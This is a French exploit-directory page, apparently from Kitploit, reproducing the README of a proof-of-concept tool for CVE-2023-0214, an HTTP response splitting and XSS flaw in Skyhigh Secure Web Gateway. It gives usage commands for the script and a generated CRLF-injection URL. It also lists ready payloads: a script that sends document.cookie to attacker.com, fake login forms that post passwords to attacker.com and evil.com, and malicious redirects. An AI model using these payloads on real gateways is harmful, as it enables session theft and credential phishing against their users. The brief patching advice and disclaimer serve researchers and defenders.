Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-0214 — Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS) | Kitploit
Outils/GitHubGitHub/0pts/cve-2023-0214
Outils de PhishingAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHub0pts/cve-2023-0214

CVE-2023-0214

Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS)

Voir le dépôt
2il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

SWG Exploit Generator

root@kitploit:~
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝

par 0PTS

Preuve de concept de la vulnérabilité HTTP Response Splitting dans Skyhigh Secure Web Gateway (anciennement McAfee Web Gateway).

À propos de la vulnérabilité

Vulnérabilité critique de HTTP Response Splitting dans Skyhigh Secure Web Gateway, permettant d'exécuter à distance des attaques XSS via l'injection de code HTML/JavaScript arbitraire.

Détails techniques

  • Type : HTTP Response Splitting / Cross-Site Scripting (XSS)
  • Dangerosité : Élevée
  • Vecteur d'attaque : À distance, ne nécessite pas d'authentification

Principe de fonctionnement de l'exploit

La vulnérabilité se trouve dans le plugin "Ssos" (action SetLoginToken), qui traite incorrectement les paramètres URL :

  1. Paramètre "p" → injecté dans l'en-tête P3P
  2. Paramètre "c" → injecté dans le corps de la réponse
  3. Paramètre "v" → injecté dans le cookie MwgSso

Comme les caractères de nouvelle ligne (\r\n / %0d%0a) ne sont pas échappés, un attaquant peut :

  • Injecter des en-têtes HTTP arbitraires
  • Redéfinir Content-Type et Content-Length
  • Injecter du code HTML/JavaScript arbitraire

Le navigateur ignore le reste du contenu de la réponse après un Content-Length correctement formé, ce qui permet de substituer complètement le contenu affiché.

Utilisation

Lancement de base

root@kitploit:~
python explot.py

Avec paramètres (comme nmap)

root@kitploit:~
# XSS de base
python explot.py -d example.com -p "<script>alert(document.domain)</script>"

# Redirection
python explot.py -d target.com -p '<meta http-equiv="refresh" content="0;url=https://evil.com/">'

# Formulaire de phishing
python explot.py -d bank.com -p '<form action="https://evil.com/steal"><input name="pass" placeholder="Password"><button>Login</button></form>'

# URL uniquement (mode silencieux)
python explot.py -d example.com -p "<script>alert(1)</script>" -q

Paramètres

root@kitploit:~
-d, --domain    Domaine cible (par défaut : google.com)
-x, --prefix    Préfixe de chemin URL (par défaut : chemin interne SWG)
-p, --payload   Payload HTML/JavaScript
-q, --quiet     Mode silencieux - uniquement l'URL
-v, --version   Version du script
-h, --help      Aide

Exemples de payload

XSS avec vol de cookies

root@kitploit:~
<script>fetch('https://attacker.com/log?c='+document.cookie)</script>

Formulaire de phishing

root@kitploit:~
<html>
<body style="font-family:Arial">
<h2>Session Expired - Please Login Again</h2>
<form action="https://attacker.com/phish" method="POST">
<input type="text" name="user" placeholder="Username"><br>
<input type="password" name="pass" placeholder="Password"><br>
<button>Login</button>
</form>
</body>
</html>

Redirection vers un site malveillant

root@kitploit:~
<meta http-equiv="refresh" content="0;url=https://malicious-site.com/">

Démonstration

root@kitploit:~
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝

[+] Domaine cible :   example.com
[+] Longueur du payload :  43 bytes
[+] Longueur de l'URL :      234 caractères

[+] URL générée :

http://example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=1&c=1&p=p%0D%0AContent-Type%3A%20text%2Fhtml%3Bcharset%3Dutf-8%0D%0AContent-Length%3A%2043%0D%0A%0D%0A%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

Protection

  1. Mettez à jour Skyhigh SWG vers la dernière version
  2. Utilisez un WAF avec filtrage des injections CRLF
  3. Surveillez les requêtes suspectes vers /mwg-internal/*

Avertissement

⚠️ ATTENTION : Cet outil est destiné exclusivement à :

  • Tests de pénétration autorisés
  • Fins éducatives
  • Compétitions CTF
  • Recherche en sécurité

L'utilisation contre des systèmes sans autorisation explicite du propriétaire est illégale.

Sources

  • https://www.exploit-db.com/exploits/51237
  • Skyhigh Security Bulletins

root@kitploit:~
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝
Télécharger l’outil